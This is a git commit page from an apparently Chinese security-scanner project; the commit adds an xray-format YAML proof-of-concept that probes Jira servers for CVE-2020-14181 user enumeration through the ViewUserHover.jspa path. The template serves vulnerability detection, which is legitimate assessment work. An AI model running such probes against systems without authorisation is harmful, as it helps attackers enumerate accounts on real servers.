优化xray解析模块,支持groups、新增poc

This commit is contained in:
影舞者
2021-11-16 14:42:35 +08:00
parent 858c28724b
commit b06d7ac94c
313 changed files with 4314 additions and 760 deletions
+14
View File
@@ -0,0 +1,14 @@
name: poc-yaml-jira-cve-2020-14181
set:
r: randomLowercase(8)
rules:
- method: GET
path: /secure/ViewUserHover.jspa?username={{r}}
follow_redirects: false
expression: |
response.status == 200 && response.body.bcontains(bytes("/secure/ViewProfile.jspa?name=" + r)) && response.body.bcontains(bytes("com.atlassian.jira"))
detail:
author: whwlsfb(https://github.com/whwlsfb)
links:
- https://www.tenable.com/cve/CVE-2020-14181
- https://twitter.com/ptswarm/status/1318914772918767619